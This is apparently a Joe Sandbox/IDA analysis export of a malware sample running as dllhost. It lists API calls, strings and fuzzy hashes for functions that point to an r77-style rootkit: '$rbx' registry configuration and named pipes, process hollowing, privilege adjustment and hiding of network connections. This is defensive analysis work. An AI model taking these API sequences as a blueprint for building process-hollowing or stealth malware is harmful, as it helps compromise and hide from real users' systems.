RegOpenKeyExW.ADVAPI32 ref: 00000001400016BE
RegCloseKey.ADVAPI32 ref: 00000001400016D9
RegOpenKeyExW.ADVAPI32 ref: 00000001400016F9
RegCloseKey.ADVAPI32 ref: 0000000140001714
RegOpenKeyExW.ADVAPI32 ref: 0000000140001734
RegCloseKey.ADVAPI32 ref: 000000014000174F
RegOpenKeyExW.ADVAPI32 ref: 000000014000176F
RegCloseKey.ADVAPI32 ref: 000000014000178A
RegCloseKey.ADVAPI32 ref: 0000000140001794

Part of subcall function 0000000140001274: RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400012DF
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400012F0
Part of subcall function 0000000140001274: RegEnumValueW.ADVAPI32 ref: 000000014000134F
Part of subcall function 0000000140001274: StrCmpIW.SHLWAPI ref: 0000000140001388
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013C7
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400013D5
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013F2
Part of subcall function 0000000140001274: HeapFree.KERNEL32 ref: 0000000140001400

Strings

startup, xrefs: 00000001400015C9
process_names, xrefs: 0000000140001641
udp, xrefs: 0000000140001768
service_names, xrefs: 00000001400016B7
paths, xrefs: 000000014000167C
tcp_local, xrefs: 00000001400016F2
pid, xrefs: 0000000140001606
tcp_remote, xrefs: 000000014000172D
SOFTWARE\$rbx-config, xrefs: 0000000140001586

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 3993315683-3414887735
Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

Function 0000000140002A0C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 0000000140002A3D
StrCatW.SHLWAPI ref: 0000000140002A4B
GetModuleHandleW.KERNEL32 ref: 0000000140002A54
GetCurrentProcess.KERNEL32 ref: 0000000140002A74
K32GetModuleInformation.KERNEL32 ref: 0000000140002A88
CreateFileW.KERNELBASE ref: 0000000140002AB8
CreateFileMappingW.KERNELBASE ref: 0000000140002AE2
MapViewOfFile.KERNELBASE ref: 0000000140002B05
lstrcmpiA.KERNEL32 ref: 0000000140002B5B
VirtualProtect.KERNEL32 ref: 0000000140002B8E
VirtualProtect.KERNEL32 ref: 0000000140002BBE
CloseHandle.KERNELBASE ref: 0000000140002BC7
CloseHandle.KERNEL32 ref: 0000000140002BD0
FreeLibrary.KERNEL32 ref: 0000000140002BD9

Strings

.text, xrefs: 0000000140002B54
C:\Windows\System32\, xrefs: 0000000140002A2F

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

Function 0000000140003728 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 000000014000374D
ConnectNamedPipe.KERNELBASE ref: 000000014000375A
ReadFile.KERNELBASE ref: 000000014000377D
WriteFile.KERNEL32 ref: 00000001400037AB
Sleep.KERNEL32 ref: 00000001400037B8
DisconnectNamedPipe.KERNELBASE ref: 00000001400037C1

Strings

M, xrefs: 000000014000379E
\\.\pipe\$rbx-childproc, xrefs: 0000000140003735

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\$rbx-childproc
API String ID: 2203880229-2840927681
Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

Function 0000000140002CB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 0000000140002CD5
ConnectNamedPipe.KERNELBASE ref: 0000000140002CE2
ReadFile.KERNELBASE ref: 0000000140002D05
Sleep.KERNEL32 ref: 0000000140002D26
DisconnectNamedPipe.KERNELBASE ref: 0000000140002D2F

Strings

\\.\pipe\$rbx-control, xrefs: 0000000140002CBD

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\$rbx-control
API String ID: 2071455217-3647231676
Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

Function 0000000140003668 Relevance: 9.1, APIs: 6, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140003683
HeapAlloc.KERNEL32 ref: 0000000140003697
GetProcessHeap.KERNEL32 ref: 00000001400036A0
HeapAlloc.KERNEL32 ref: 00000001400036AE
K32EnumProcesses.KERNEL32 ref: 00000001400036C9
SleepEx.KERNELBASE ref: 000000014000371E

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002021
HeapAlloc.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002032

Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D23
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D36
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D44
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D55
Part of subcall function 0000000140001CF0: K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
Part of subcall function 0000000140001CF0: OpenProcess.KERNEL32 ref: 0000000140001D9D
Part of subcall function 0000000140001CF0: K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
Part of subcall function 0000000140001CF0: ReadProcessMemory.KERNEL32 ref: 0000000140001E01
Part of subcall function 0000000140001CF0: CloseHandle.KERNELBASE ref: 0000000140001E46
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E58
Part of subcall function 0000000140001CF0: HeapFree.KERNEL32 ref: 0000000140001E66
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E6C
Part of subcall function 0000000140001CF0: RtlFreeHeap.NTDLL ref: 0000000140001E7A

OpenProcess.KERNEL32 ref: 0000000140002079
TerminateProcess.KERNEL32 ref: 000000014000208C
CloseHandle.KERNEL32 ref: 0000000140002095
GetProcessHeap.KERNEL32 ref: 00000001400020A5

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

Function 0000025DC1ACF598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 0000025DC1ACF611
GetFileType.KERNELBASE ref: 0000025DC1ACF627

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: 43d2cc48a630aaf4f6387261994555414ca80084c505d6fbd7e9283155423c83
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 5A31B622610FA491DF70CF7499982692661F369BB2F65034BDB6A873F0CB36D462C348

Function 0000025DC1CEF598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 0000025DC1CEF611
GetFileType.KERNELBASE ref: 0000025DC1CEF627

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: 0bc6dbbec7d97e987cdd8a9e02bb2df7b35b64828365bc587a2bf0354691da2d
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: BD31E822610F6493DB708B649E88268A654F765BB2F65034BFB6A873F0CB34D4E1C704

Function 0000025DC1A92EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000025DC1A9302E

Memory Dump Source

Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 7d4c6d6694181fca60a94fbb4f08e5cc5269284d95e537889e42ce9c480c530d
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 1391F372701B6087DF64CF69D80876D73B1FB64B96F5881229E4987B98DA38D893C708

Function 0000000140002D38 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1

ExitProcess.KERNEL32 ref: 0000000140002D43

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
String ID:
API String ID: 3805535264-0
Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

Non-executed Functions

Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 317injectionthreadmemoryCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 000000014000252A
VirtualAllocEx.KERNEL32 ref: 0000000140002581
WriteProcessMemory.KERNEL32 ref: 00000001400025A9
VirtualProtectEx.KERNEL32 ref: 00000001400025D4
WriteProcessMemory.KERNEL32 ref: 0000000140002613
VirtualProtectEx.KERNEL32 ref: 000000014000265D
VirtualAlloc.KERNEL32 ref: 0000000140002693
GetThreadContext.KERNEL32 ref: 00000001400026B6
WriteProcessMemory.KERNEL32 ref: 00000001400026E1
SetThreadContext.KERNEL32 ref: 0000000140002704
ResumeThread.KERNEL32 ref: 0000000140002717
VirtualAllocEx.KERNEL32 ref: 0000000140002759
WriteProcessMemory.KERNEL32 ref: 0000000140002781
VirtualProtectEx.KERNEL32 ref: 00000001400027AB
WriteProcessMemory.KERNEL32 ref: 00000001400027EA
VirtualProtectEx.KERNEL32 ref: 0000000140002834
VirtualAlloc.KERNEL32 ref: 0000000140002869
Wow64GetThreadContext.KERNEL32 ref: 0000000140002887
WriteProcessMemory.KERNEL32 ref: 00000001400028AC
Wow64SetThreadContext.KERNEL32 ref: 00000001400028CA
OpenProcess.KERNEL32 ref: 00000001400028E6
TerminateProcess.KERNEL32 ref: 00000001400028F6

Part of subcall function 00000001400020CC: GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
Part of subcall function 00000001400020CC: GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

h, xrefs: 00000001400024EE
@, xrefs: 0000000140002751
NtUnmapViewOfSection, xrefs: 000000014000253C
RtlGetVersion, xrefs: 000000014000249B

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
API String ID: 1036100660-1371749706
Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04

Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
GetProcessHeap.KERNEL32 ref: 00000001400012DF
HeapAlloc.KERNEL32 ref: 00000001400012F0
RegEnumValueW.ADVAPI32 ref: 000000014000134F
StrCmpIW.SHLWAPI ref: 0000000140001388
StrCmpW.SHLWAPI ref: 0000000140001390
GetProcessHeap.KERNEL32 ref: 00000001400013C7
HeapAlloc.KERNEL32 ref: 00000001400013D5
GetProcessHeap.KERNEL32 ref: 00000001400013F2
HeapFree.KERNEL32 ref: 0000000140001400
lstrlenW.KERNEL32 ref: 0000000140001409
GetProcessHeap.KERNEL32 ref: 0000000140001417
HeapAlloc.KERNEL32 ref: 0000000140001425
StrCpyW.SHLWAPI ref: 0000000140001447
GetProcessHeap.KERNEL32 ref: 000000014000145E
HeapFree.KERNEL32 ref: 000000014000146C

Strings

d, xrefs: 0000000140001312

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710

Function 0000025DC1AC2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000025DC1AC3094
lstrlenW.KERNEL32 ref: 0000025DC1AC32BE

Part of subcall function 0000025DC1AC1A30: OpenProcess.KERNEL32 ref: 0000025DC1AC1A56
Part of subcall function 0000025DC1AC1A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000025DC1AC1A74
Part of subcall function 0000025DC1AC1A30: PathFindFileNameW.SHLWAPI ref: 0000025DC1AC1A83
Part of subcall function 0000025DC1AC1A30: lstrlenW.KERNEL32 ref: 0000025DC1AC1A8F
Part of subcall function 0000025DC1AC1A30: StrCpyW.SHLWAPI ref: 0000025DC1AC1AA2
Part of subcall function 0000025DC1AC1A30: CloseHandle.KERNEL32 ref: 0000025DC1AC1AB0

GetProcAddress.KERNEL32 ref: 0000025DC1AC30A9

Part of subcall function 0000025DC1AC3F88: StrCmpNIW.SHLWAPI(?,?,?,0000025DC1AC272F), ref: 0000025DC1AC3FA0

StrCmpNIW.SHLWAPI ref: 0000025DC1AC30EC
lstrlenW.KERNEL32 ref: 0000025DC1AC3214

Strings

\Device\Nsi, xrefs: 0000025DC1AC30DF
NtQueryObject, xrefs: 0000025DC1AC309F
ntdll.dll, xrefs: 0000025DC1AC308D

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: f8e609f62974e7918783a99788bdf0ad2f2b3bf56514d942fb2f1a8205c14132
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: F6B18E22210FA086EF74DFA5D9287A9A3A5FB64B87F409017EE0993794DE36CC42C744

Function 0000025DC1CE2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000025DC1CE3094
